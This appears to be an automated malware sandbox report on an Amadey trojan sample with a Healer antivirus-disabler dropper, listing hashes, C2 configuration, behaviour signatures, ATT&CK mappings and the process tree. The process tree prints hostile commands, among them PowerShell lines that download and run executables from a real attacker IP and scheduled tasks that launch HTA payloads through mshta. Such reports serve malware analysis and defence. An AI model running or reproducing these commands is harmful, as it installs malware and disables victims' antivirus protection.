Overview

overview

10

Static

static

3

aa883f75bf...97.exe

windows7-x64

10

aa883f75bf...97.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    145s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250207-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250207-enlocale:en-usos:windows10-2004-x64system
  • submitted
    11-02-2025 17:24

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    aa883f75bff0257a0fefd5d8d20c6297.exe

  • Size

    2.0MB

  • MD5

    aa883f75bff0257a0fefd5d8d20c6297

  • SHA1

    3fb6e0f9349bab21030e8f7168cf74ea89567c97

  • SHA256

    50df2efc36116c3304f57dbc7d5f6ef6adef582e53f0662b2dac87f8757f1ced

  • SHA512

    651922f8a37211c043287b37d7f2e7a06fa795550503687ddcd93d17d96d504ac420fd642f659b722feb3dbbf173042480a470382cece8717f53e696af5d57b7

  • SSDEEP

    49152:yzrn/QLcFz1XcsHUO6nWM2UDhIImtMkKuK6nSsLThklxLEOGMJ7F/gcI1:A4LcFz1XcsHUOaWDUDhnmtMkv1SDBl5b

Score
10/10
amadeyhealer9c9aa5defense_evasiondiscoverydropperevasionexecutionpersistencetrojan

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://185.215.113.16/defend/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://185.215.113.16/mine/random.exe

Extracted

Family

amadey

Version

4.42

Botnet

9c9aa5

C2

http://185.215.113.43

Attributes
  • install_dir

    abc3bc1985

  • install_file

    skotes.exe

  • strings_key

    8a35cf2ea38c2817dba29a4b5b25dcf0

  • url_paths

    /Zu7JuNko/index.php

rc4.plain

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

    trojanamadey
  • Amadey family
    amadey
  • Detects Healer an antivirus disabler dropper 3 IoCs
  • Healer

    Healer an antivirus disabler dropper.

    dropperhealer
  • Healer family
    healer
  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
    evasiontrojan
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
    defense_evasiontrojan
  • Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs
    evasiontrojan
  • Modifies Windows Defender notification settings 3 TTPs 2 IoCs
    defense_evasiontrojan
  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 5 IoCs
    defense_evasion
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Using powershell.exe command.

    execution
  • Downloads MZ/PE file 5 IoCs
  • Checks BIOS information in registry 2 TTPs 10 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 4 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 9 IoCs
  • Identifies Wine through registry keys 2 TTPs 5 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

    defense_evasion
  • Windows security modification 2 TTPs 2 IoCs
    defense_evasiontrojan
  • Adds Run key to start application 2 TTPs 2 IoCs
    persistence
  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Windows directory 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 25 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

    discovery
  • Delays execution with timeout.exe 1 IoCs
    defense_evasion
  • Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 28 IoCs
  • Suspicious use of AdjustPrivilegeToken 10 IoCs
  • Suspicious use of FindShellTrayWindow 4 IoCs
  • Suspicious use of SendNotifyMessage 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:3588
      • C:\Users\Admin\AppData\Local\Temp\aa883f75bff0257a0fefd5d8d20c6297.exe
        "C:\Users\Admin\AppData\Local\Temp\aa883f75bff0257a0fefd5d8d20c6297.exe"
        2⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Checks computer location settings
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Drops file in Windows directory
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of WriteProcessMemory
        PID:3640
        • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
          "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
          3⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Downloads MZ/PE file
          • Checks BIOS information in registry
          • Checks computer location settings
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Adds Run key to start application
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:3064
          • C:\Users\Admin\AppData\Local\Temp\1075350001\k6Sly2p.exe
            "C:\Users\Admin\AppData\Local\Temp\1075350001\k6Sly2p.exe"
            4⤵
            • Suspicious use of NtCreateUserProcessOtherParentProcess
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2908
          • C:\Users\Admin\AppData\Local\Temp\1075489001\c0754fb50d.exe
            "C:\Users\Admin\AppData\Local\Temp\1075489001\c0754fb50d.exe"
            4⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of SendNotifyMessage
            • Suspicious use of WriteProcessMemory
            PID:2468
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c schtasks /create /tn YZoFRmamkOS /tr "mshta C:\Users\Admin\AppData\Local\Temp\lghdxwh16.hta" /sc minute /mo 25 /ru "Admin" /f
              5⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:4000
              • C:\Windows\SysWOW64\schtasks.exe
                schtasks /create /tn YZoFRmamkOS /tr "mshta C:\Users\Admin\AppData\Local\Temp\lghdxwh16.hta" /sc minute /mo 25 /ru "Admin" /f
                6⤵
                • System Location Discovery: System Language Discovery
                • Scheduled Task/Job: Scheduled Task
                PID:3544
            • C:\Windows\SysWOW64\mshta.exe
              mshta C:\Users\Admin\AppData\Local\Temp\lghdxwh16.hta
              5⤵
              • Checks computer location settings
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:2076
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'CVHFHKKOBCWIH6JS6KPGHF1LUUMDCIXF.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
                6⤵
                • Blocklisted process makes network request
                • Command and Scripting Interpreter: PowerShell
                • Downloads MZ/PE file
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:224
                • C:\Users\Admin\AppData\Local\TempCVHFHKKOBCWIH6JS6KPGHF1LUUMDCIXF.EXE
                  "C:\Users\Admin\AppData\Local\TempCVHFHKKOBCWIH6JS6KPGHF1LUUMDCIXF.EXE"
                  7⤵
                  • Modifies Windows Defender DisableAntiSpyware settings
                  • Modifies Windows Defender Real-time Protection settings
                  • Modifies Windows Defender TamperProtection settings
                  • Modifies Windows Defender notification settings
                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                  • Checks BIOS information in registry
                  • Executes dropped EXE
                  • Identifies Wine through registry keys
                  • Windows security modification
                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:536
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1075490021\am_no.cmd" "
            4⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:4524
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1075490021\am_no.cmd" any_word
              5⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:1980
              • C:\Windows\SysWOW64\timeout.exe
                timeout /t 2
                6⤵
                • System Location Discovery: System Language Discovery
                • Delays execution with timeout.exe
                PID:3948
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                6⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:3152
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                  7⤵
                  • Command and Scripting Interpreter: PowerShell
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4456
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                6⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:5084
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                  7⤵
                  • Command and Scripting Interpreter: PowerShell
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:676
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                6⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:3964
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                  7⤵
                  • Command and Scripting Interpreter: PowerShell
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:856
              • C:\Windows\SysWOW64\schtasks.exe
                schtasks /create /tn "0a5DImaiwvC" /tr "mshta \"C:\Temp\yk8UlJBFQ.hta\"" /sc minute /mo 25 /ru "Admin" /f
                6⤵
                • System Location Discovery: System Language Discovery
                • Scheduled Task/Job: Scheduled Task
                PID:4516
              • C:\Windows\SysWOW64\mshta.exe
                mshta "C:\Temp\yk8UlJBFQ.hta"
                6⤵
                • Checks computer location settings
                • System Location Discovery: System Language Discovery
                PID:2540
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
                  7⤵
                  • Blocklisted process makes network request
                  • Command and Scripting Interpreter: PowerShell
                  • Downloads MZ/PE file
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3852
          • C:\Users\Admin\AppData\Local\Temp\1075515001\k6Sly2p.exe
            "C:\Users\Admin\AppData\Local\Temp\1075515001\k6Sly2p.exe"
            4⤵
            • Suspicious use of NtCreateUserProcessOtherParentProcess
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2708
      • C:\Users\Admin\AppData\Local\Temp\1075350001\k6Sly2p.exe
        "C:\Users\Admin\AppData\Local\Temp\1075350001\k6Sly2p.exe"
        2⤵
        • Executes dropped EXE
        • Drops file in Windows directory
        • System Location Discovery: System Language Discovery
        PID:2036
      • C:\Users\Admin\AppData\Local\Temp\1075515001\k6Sly2p.exe
        "C:\Users\Admin\AppData\Local\Temp\1075515001\k6Sly2p.exe"
        2⤵
        • Executes dropped EXE
        • Drops file in Windows directory
        • System Location Discovery: System Language Discovery
        PID:3428
    • C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
      "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xOTUuNDMiIHNoZWxsX3ZlcnNpb249IjEuMy4xOTUuNDMiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7OUNFMzdGREQtQkNCNC00NDE2LUJFMzUtRUQxMTE0MkFERUZEfSIgdXNlcmlkPSJ7QUNGODFFMDUtMTdGNS00NzI2LTk0MEUtNEVBODg5NDRCMjc2fSIgaW5zdGFsbHNvdXJjZT0ibGltaXRlZCIgcmVxdWVzdGlkPSJ7QUYxNzU4NzgtQzkwOC00QTJELUJBNzUtQzIyNjlBMjZCRDBDfSIgZGVkdXA9ImNyIiBkb21haW5qb2luZWQ9IjAiPjxodyBsb2dpY2FsX2NwdXM9IjIiIHBoeXNtZW1vcnk9IjQiIGRpc2tfdHlwZT0iMiIgc3NlPSIxIiBzc2UyPSIxIiBzc2UzPSIxIiBzc3NlMz0iMSIgc3NlNDE9IjEiIHNzZTQyPSIxIiBhdng9IjEiLz48b3MgcGxhdGZvcm09IndpbiIgdmVyc2lvbj0iMTAuMC4xOTA0MS4xMjg4IiBzcD0iIiBhcmNoPSJ4NjQiIHByb2R1Y3RfdHlwZT0iNDgiIGlzX3dpcD0iMCIgaXNfaW5fbG9ja2Rvd25fbW9kZT0iMCIvPjxvZW0gcHJvZHVjdF9tYW51ZmFjdHVyZXI9IiIgcHJvZHVjdF9uYW1lPSIiLz48ZXhwIGV0YWc9IiZxdW90O0UreGJBejZZNnNVMTI4OWJTNnFsNFZSTGJramZCVUdUTUpzanJIcjQ0aUk9JnF1b3Q7Ii8-PGFwcCBhcHBpZD0iezhBNjlEMzQ1LUQ1NjQtNDYzYy1BRkYxLUE2OUQ5RTUzMEY5Nn0iIHZlcnNpb249IjEyMy4wLjYzMTIuMTIzIiBuZXh0dmVyc2lvbj0iIiBsYW5nPSJlbiIgYnJhbmQ9IkdHTFMiIGNsaWVudD0iIiBpbnN0YWxsYWdlPSI0IiBpbnN0YWxsZGF0ZXRpbWU9IjE3Mzg5NDU5MjEiIG9vYmVfaW5zdGFsbF90aW1lPSIxMzM4MzQxODE5ODA3NzAwMDAiPjxldmVudCBldmVudHR5cGU9IjMxIiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIyMTc5ODYyIiBzeXN0ZW1fdXB0aW1lX3RpY2tzPSI0ODM4ODI4MDk2Ii8-PC9hcHA-PC9yZXF1ZXN0Pg
      1⤵
      • System Location Discovery: System Language Discovery
      • System Network Configuration Discovery: Internet Connection Discovery
      PID:4028
    • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
      C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
      1⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Checks BIOS information in registry
      • Executes dropped EXE
      • Identifies Wine through registry keys
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious behavior: EnumeratesProcesses
      PID:4516
    • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
      C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
      1⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Checks BIOS information in registry
      • Executes dropped EXE
      • Identifies Wine through registry keys
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious behavior: EnumeratesProcesses
      PID:4332

    Network

    MITRE ATT&CK Enterprise v15

    Reconnaissance

    Resource Development

    Initial Access

    Execution

    Command and Scripting Interpreter

    1
    T1059

    PowerShell

    1
    T1059.001

    Scheduled Task/Job

    1
    T1053

    Scheduled Task

    1
    T1053.005

    Persistence

    Boot or Logon Autostart Execution

    1
    T1547

    Registry Run Keys / Startup Folder

    1
    T1547.001

    Create or Modify System Process

    4
    T1543

    Windows Service

    4
    T1543.003

    Scheduled Task/Job

    1
    T1053

    Scheduled Task

    1
    T1053.005

    Privilege Escalation

    Boot or Logon Autostart Execution

    1
    T1547

    Registry Run Keys / Startup Folder

    1
    T1547.001

    Create or Modify System Process

    4
    T1543

    Windows Service

    4
    T1543.003

    Scheduled Task/Job

    1
    T1053

    Scheduled Task

    1
    T1053.005

    Defense Evasion

    Impair Defenses

    5
    T1562

    Disable or Modify Tools

    5
    T1562.001

    Modify Registry

    6
    T1112

    Virtualization/Sandbox Evasion

    2
    T1497

    Credential Access

    Discovery

    Query Registry

    4
    T1012

    System Information Discovery

    3
    T1082

    System Location Discovery

    1
    T1614

    System Language Discovery

    1
    T1614.001

    System Network Configuration Discovery

    1
    T1016

    Internet Connection Discovery

    1
    T1016.001

    Virtualization/Sandbox Evasion

    2
    T1497

    Lateral Movement

    Collection

    Command and Control

    Exfiltration

    Impact

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Temp\yk8UlJBFQ.hta
      Filesize

      782B

      MD5

      16d76e35baeb05bc069a12dce9da83f9

      SHA1

      f419fd74265369666595c7ce7823ef75b40b2768

      SHA256

      456b0f7b0be895af21c11af10a2f10ce0f02ead47bdf1de8117d4db4f7e4c3e7

      SHA512

      4063efb47edf9f8b64ef68ad7a2845c31535f3679b6368f9cb402411c7918b82bd6355982821bfb3b7de860b5979b8b0355c15f4d18f85d894e2f2c8e95ef18e

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
      Filesize

      1KB

      MD5

      6195a91754effb4df74dbc72cdf4f7a6

      SHA1

      aba262f5726c6d77659fe0d3195e36a85046b427

      SHA256

      3254495a5513b37a2686a876d0040275414699e7ce760e7b5ee05e41a54b96f5

      SHA512

      ed723d15de267390dc93263538428e2c881be3494c996a810616b470d6df7d5acfcc8725687d5c50319ebef45caef44f769bfc32e0dc3abd249dacff4a12cc89

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      16KB

      MD5

      d9e98e9413335dbf0d472bb246f217f0

      SHA1

      2f7b0c4ece61bfbed8d726acef66a05dc0457afe

      SHA256

      1e1afe4c1d980879af246ba19fd5eede49379abe08d166e0d0acd6bfbcfac042

      SHA512

      e16e5f4731fb3d5a22454c00db07924f662ff4d62d1015251ba8eac217478f0810df16f7d37ca220db0215346a6caa206f8c8b7c1dd4933f7533dbb176c9d980

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      17KB

      MD5

      fbddbf1af975b17f2f7b33997fdda577

      SHA1

      64bb6ebc9d22af3e5be29720db535673df4f63fc

      SHA256

      a838d7ba67fa2b7028437b938be462d91335ed8f502ca9555f8dcb814300368f

      SHA512

      5ca04957c791b99436b762e6fccf01c0fe38be553668e8201664661922f7da72d62d46779bbc27cca2236ff7eb62e7490c0991ff8207d2da1d1910e8d9dfda4f

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      17KB

      MD5

      e2bb95522e9bdbd550ca284f3f21447c

      SHA1

      fadc6ba565d698b60da37e1b923d1727740025b8

      SHA256

      e7368783feb2db018eccb1912c49cf2000e08f53d24d8676d019055f97b204fe

      SHA512

      67a7d8a5867fce99ab4e7012682e85a580ff18f9cf6d588c9da0fef9d0124ea0da30b83a19c823df1e4e34d1f54280b69ed82147197cce4e9c02faa3273aa7ef

      Download Submit

    • C:\Users\Admin\AppData\Local\TempCVHFHKKOBCWIH6JS6KPGHF1LUUMDCIXF.EXE
      Filesize

      1.7MB

      MD5

      eb08d89d3f955a53b94a98163d6b767d

      SHA1

      b9b08510af7e5e92a7fe2c96b7baa60c58f7d1d9

      SHA256

      314a1bfda1983b7d65b3dfaf5e2a954f0c7582ed6794515d1297b1db73bb3c31

      SHA512

      820f69a1644dfb02d48523388ba6ca0e4013b73c39d5b0d16d460352b3586b7d006bb38be9d8b1a5e95f19714f919691939dfaae74148199d61214ee70bcc664

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\1074284001\r7MRNUY.exe
      Filesize

      1.0MB

      MD5

      957869187fe868bb6f4bc8cc2f0202f8

      SHA1

      7160e5723a88e5f916e6f5fba93e6166fe62506e

      SHA256

      7323a23e4e98289a19e1e0e861e914eed37bddf4e407d732487958d2dc7e24a8

      SHA512

      f6add1fc83167799abd65327197885ce9b4878a502646608c893308db52c4d5c5e46fd5bf70c38b457171b0da19cb017df147f42d3775d9ab62b57a34e969805

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\1074852001\L5shRfh.exe
      Filesize

      1.2MB

      MD5

      0c4a7b40c26f177cc849fc4c0b082b38

      SHA1

      9838757daf86de09b892f570cd0964b2c8b806fe

      SHA256

      fec00d37f2bac63582bd445c36ae1b202634b5eafda6a027ddaa3413f4b7d667

      SHA512

      cd79c513e8c8fc0f749d9daee2a0d54c8f4d8e371f13844b2d61890429150ac9e2c1dbc71729511a485fb4d3568a9817e5e844f830fb5dc05007abc181c2a5e9

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\1075350001\k6Sly2p.exe
      Filesize

      2.3MB

      MD5

      532ae0cc2387d47de8c285b3cfd4dafc

      SHA1

      2f6654c4fe01b3bb8b4b7829ade6cb6bc528be23

      SHA256

      35209605e2bcb1c50dc79aed7428240050c191eb26b704ba373a9e15d75e853e

      SHA512

      824301eb4250ffe96fa06a401b09f9dd01206b82ef7bd0ab6b814f35b599025aadd4f9803424343409e12e6b0d6ae1e27caf4290c55164777558780781d1251e

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\1075489001\c0754fb50d.exe
      Filesize

      938KB

      MD5

      b22ba25c5a115656da9e224a62752782

      SHA1

      a26d2e82e8812558e15ea6a8f245dcf23d1a450b

      SHA256

      e60af2cd6c1c46de7f3b5d8ab8a2e43198929f86b9443a66388fbce9ed48ca53

      SHA512

      f77aa45dd57d9016828482a41bda218a90ad7c60712fa9154d928c6630ae923c24114f48fd2992b376abcb86243d7dbe5190753b9d0c6bbe769b9501e867d66f

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\1075490021\am_no.cmd
      Filesize

      2KB

      MD5

      189e4eefd73896e80f64b8ef8f73fef0

      SHA1

      efab18a8e2a33593049775958b05b95b0bb7d8e4

      SHA256

      598651a10ff90d816292fba6e1a55cf9fb7bb717f3569b45f22a760849d24396

      SHA512

      be0e6542d8d26284d738a33df3d574d9849d709d091d66588685a1ac30ed1ebef48a9cc9d8281d9aeebc70fed0ddae22750cd253ec6b89e78933de08b0a09b74

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hk0qyhpq.ms0.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
      Filesize

      2.0MB

      MD5

      aa883f75bff0257a0fefd5d8d20c6297

      SHA1

      3fb6e0f9349bab21030e8f7168cf74ea89567c97

      SHA256

      50df2efc36116c3304f57dbc7d5f6ef6adef582e53f0662b2dac87f8757f1ced

      SHA512

      651922f8a37211c043287b37d7f2e7a06fa795550503687ddcd93d17d96d504ac420fd642f659b722feb3dbbf173042480a470382cece8717f53e696af5d57b7

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\lghdxwh16.hta
      Filesize

      726B

      MD5

      45fcc78edc0179e3806f323c341f65f4

      SHA1

      bb62584980945e701562473ea63ee5fc3ccc7eae

      SHA256

      6f26be4060ea48879f71eb52cbc28690f7e60acae7f9bad1fb9f49797d1a89a7

      SHA512

      cbc452e27e6669612b77d70300f1bfd1cc659b97a948060c8cfd6c835342b136555b374e491ae1c1ea0d23f0ab2c5e2ff2037d6f3c67d8b3a867e20dc8b7238a

      Download Submit

    • C:\Windows\Tasks\Test Task17.job
      Filesize

      232B

      MD5

      4c3a94783da67d3951170fb7107a2397

      SHA1

      678ad30273c30cf8ec95c59f270abc5921768615

      SHA256

      7e7da2e3fc0a8e41fd211dc49850b966a2b09a0cb2f601f0233b21d664ca25da

      SHA512

      00195f38e6ab6f92ac8c852639279eb055dd2e1abd9de2f41680333c1b1afd02823c99aeb3057028b4b48c1f84465789feae34bd811558fe47216d9a8deb223f

      Download Submit

    • memory/224-2540-0x0000000007BC0000-0x0000000007C56000-memory.dmp

      Filesize

      600KB

      Download

    • memory/224-1444-0x0000000005850000-0x0000000005E78000-memory.dmp

      Filesize

      6.2MB

      Download

    • memory/224-1445-0x0000000005F70000-0x0000000005F92000-memory.dmp

      Filesize

      136KB

      Download

    • memory/224-1457-0x0000000006220000-0x0000000006574000-memory.dmp

      Filesize

      3.3MB

      Download

    • memory/224-2545-0x0000000007B50000-0x0000000007B72000-memory.dmp

      Filesize

      136KB

      Download

    • memory/224-1472-0x0000000006C30000-0x0000000006C4A000-memory.dmp

      Filesize

      104KB

      Download

    • memory/224-1471-0x0000000007E20000-0x000000000849A000-memory.dmp

      Filesize

      6.5MB

      Download

    • memory/224-1443-0x0000000005130000-0x0000000005166000-memory.dmp

      Filesize

      216KB

      Download

    • memory/224-1459-0x0000000006730000-0x000000000677C000-memory.dmp

      Filesize

      304KB

      Download

    • memory/224-1452-0x00000000060B0000-0x0000000006116000-memory.dmp

      Filesize

      408KB

      Download

    • memory/224-1458-0x0000000006700000-0x000000000671E000-memory.dmp

      Filesize

      120KB

      Download

    • memory/224-1451-0x0000000006040000-0x00000000060A6000-memory.dmp

      Filesize

      408KB

      Download

    • memory/536-2843-0x00000000000B0000-0x0000000000516000-memory.dmp

      Filesize

      4.4MB

      Download

    • memory/536-2858-0x00000000000B0000-0x0000000000516000-memory.dmp

      Filesize

      4.4MB

      Download

    • memory/536-2857-0x00000000000B0000-0x0000000000516000-memory.dmp

      Filesize

      4.4MB

      Download

    • memory/536-2899-0x00000000000B0000-0x0000000000516000-memory.dmp

      Filesize

      4.4MB

      Download

    • memory/536-2902-0x00000000000B0000-0x0000000000516000-memory.dmp

      Filesize

      4.4MB

      Download

    • memory/676-2849-0x0000000005930000-0x0000000005C84000-memory.dmp

      Filesize

      3.3MB

      Download

    • memory/676-2860-0x0000000005FF0000-0x000000000603C000-memory.dmp

      Filesize

      304KB

      Download

    • memory/856-2882-0x00000000062D0000-0x0000000006624000-memory.dmp

      Filesize

      3.3MB

      Download

    • memory/2908-121-0x0000000005460000-0x0000000005559000-memory.dmp

      Filesize

      996KB

      Download

    • memory/2908-95-0x0000000005670000-0x0000000005702000-memory.dmp

      Filesize

      584KB

      Download

    • memory/2908-145-0x0000000005460000-0x0000000005559000-memory.dmp

      Filesize

      996KB

      Download

    • memory/2908-143-0x0000000005460000-0x0000000005559000-memory.dmp

      Filesize

      996KB

      Download

    • memory/2908-141-0x0000000005460000-0x0000000005559000-memory.dmp

      Filesize

      996KB

      Download

    • memory/2908-139-0x0000000005460000-0x0000000005559000-memory.dmp

      Filesize

      996KB

      Download

    • memory/2908-137-0x0000000005460000-0x0000000005559000-memory.dmp

      Filesize

      996KB

      Download

    • memory/2908-133-0x0000000005460000-0x0000000005559000-memory.dmp

      Filesize

      996KB

      Download

    • memory/2908-131-0x0000000005460000-0x0000000005559000-memory.dmp

      Filesize

      996KB

      Download

    • memory/2908-130-0x0000000005460000-0x0000000005559000-memory.dmp

      Filesize

      996KB

      Download

    • memory/2908-127-0x0000000005460000-0x0000000005559000-memory.dmp

      Filesize

      996KB

      Download

    • memory/2908-125-0x0000000005460000-0x0000000005559000-memory.dmp

      Filesize

      996KB

      Download

    • memory/2908-123-0x0000000005460000-0x0000000005559000-memory.dmp

      Filesize

      996KB

